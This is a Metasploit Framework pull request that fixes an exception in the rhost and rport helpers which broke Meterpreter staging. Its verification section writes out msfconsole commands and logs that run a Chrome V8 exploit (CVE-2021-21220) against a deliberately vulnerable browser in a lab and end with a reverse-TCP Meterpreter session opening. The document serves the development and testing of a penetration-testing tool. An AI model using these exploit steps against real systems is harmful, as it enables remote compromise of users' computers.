### PR TITLE
Fix exception in rhost during meterpreter staging

### DIFF
--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -23,7 +23,7 @@ module Msf::Post::Common
   end
 
   def rhost
-    return nil unless session
+    return nil unless defined?(session) and session
 
     case session.type
     when 'meterpreter'
@@ -34,6 +34,8 @@ module Msf::Post::Common
   end
 
   def rport
+    return nil unless defined?(session) and session
+
     case session.type
     when 'meterpreter'
       session.sock.peerport

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -23,7 +23,7 @@ module Msf::Post::Common
   end
 
   def rhost
-    return nil unless defined?(session) and session
+    return super unless defined?(session) and session
 
     case session.type
     when 'meterpreter'
@@ -31,10 +31,12 @@ module Msf::Post::Common
     when 'shell', 'powershell'
       session.session_host
     end
+  rescue
+    return nil
   end
 
   def rport
-    return nil unless defined?(session) and session
+    return super unless defined?(session) and session
 
     case session.type
     when 'meterpreter'
@@ -42,6 +44,8 @@ module Msf::Post::Common
     when 'shell', 'powershell'
       session.session_port
     end
+  rescue
+    return nil
   end
 
   def peer


### PR DESCRIPTION
Strange bug, but it seems currently all the chrome exploits fail to stage meterpreter correctly.
It appears this was introduced here: https://github.com/rapid7/metasploit-framework/pull/15079/files#diff-cc6585bd12e8d43e126c2e1a79e4132f56c1e180483f410ccbf90cfb04c5e5c8R7
It looks innocuous but lib/msf/core/post/file.rb now includes lib/msf/core/post/common.rb

This means that calling rhost without a session produces an exception, which I suspect occurs on all exploit modules that   include Msf::Post::File?!? I only tested the chrome exploits however.
The callstack is as follows: 
```
metasploit-framework/lib/msf/core/module/network.rb:23:in `target_host'
metasploit-framework/lib/msf/core/session.rb:188:in `set_from_exploit'
metasploit-framework/lib/msf/core/handler.rb:220:in `create_session'
metasploit-framework/lib/msf/core/payload/stager.rb:241:in `handle_connection_stage'
metasploit-framework/lib/msf/core/payload/stager.rb:227:in `handle_connection'
```
(Sidenote: I think it would be nice if the stacktrace appeared in the logs/log command, rather than just the exception itself).

## Verification (before fix)
Follow steps from https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.md
e.g install a vulnerable version of chrome (https://chromium.cypress.io/win64/stable/89.0.4389.114 or filepuma) and run it with --no-sandbox (`"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-sandbox "http://192.168.56.1:8080"`).
```
msf6 > use exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set target 1
target => 1
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > set URIPATH /
URIPATH => /
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] 192.168.56.3     chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
[*] 192.168.56.3     chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
[*] 192.168.56.3     chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
[*] Sending stage (200262 bytes) to 192.168.56.3 
^ It gets stuck here
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) > log
[01/29/2022 08:08:50] [e(0)] core: Exception raised from handle_connection - NameError undefined local variable or method `session' for #<Module:exploit/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation datastore=[{"WORKSPACE"=>nil, "VERBOSE"=>false, "EnableContextEncoding"=>false, "ContextInformationFile"=>nil, "DisablePayloadHandler"=>false, "SRVHOST"=>"192.168.56.1", "SRVPORT"=>8080, "ListenerComm"=>nil, "SSL"=>false, "SSLCert"=>nil, "SSLCompression"=>false, "SSLCipher"=>nil, "SSLVersion"=>"Auto", "TCP::max_send_size"=>0, "TCP::send_delay"=>0, "URIPATH"=>"/", "HTTP::no_cache"=>false, "HTTP::chunked"=>false, "HTTP::header_folding"=>false, "HTTP::junk_headers"=>false, "HTTP::compression"=>"none", "HTTP::server_name"=>"Apache", "URIHOST"=>nil, "URIPORT"=>nil, "SendRobots"=>false, "PAYLOAD"=>"windows/x64/meterpreter/reverse_tcp", "LHOST"=>"192.168.56.1", "target"=>1, "LPORT"=>4444, "ReverseListenerBindPort"=>nil, "ReverseAllowProxy"=>false, "ReverseListenerComm"=>nil, "ReverseListenerBindAddress"=>nil, "ReverseListenerThreaded"=>false, "StagerRetryCount"=>10, "StagerRetryWait"=>5, "PingbackRetries"=>0, "PingbackSleep"=>30, "PayloadUUIDSeed"=>nil, "PayloadUUIDRaw"=>nil, "PayloadUUIDName"=>nil, "PayloadUUIDTracking"=>false, "EnableStageEncoding"=>false, "StageEncoder"=>nil, "StageEncoderSaveRegisters"=>"", "StageEncodingFallback"=>true, "PrependMigrate"=>false, "PrependMigrateProc"=>nil, "EXITFUNC"=>"process", "AutoLoadStdapi"=>true, "AutoVerifySessionTimeout"=>30, "InitialAutoRunScript"=>"", "AutoRunScript"=>"", "AutoSystemInfo"=>true, "EnableUnicodeEncoding"=>false, "HandlerSSLCert"=>nil, "SessionRetryTotal"=>3600, "SessionRetryWait"=>10, "SessionExpirationTimeout"=>604800, "SessionCommunicationTimeout"=>300, "PayloadProcessCommandLine"=>"", "AutoUnhookProcess"=>false}]>
Did you mean?  session_count


```

## After fix
```
msf6 exploit(multi/browser/chrome_cve_2021_21220_v8_insufficient_validation) >
[*] 192.168.56.3     chrome_cve_2021_21220_v8_insufficient_validation - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
[*] Sending stage (200262 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49710 ) at 2022-01-29 08:06:52 +0000
```
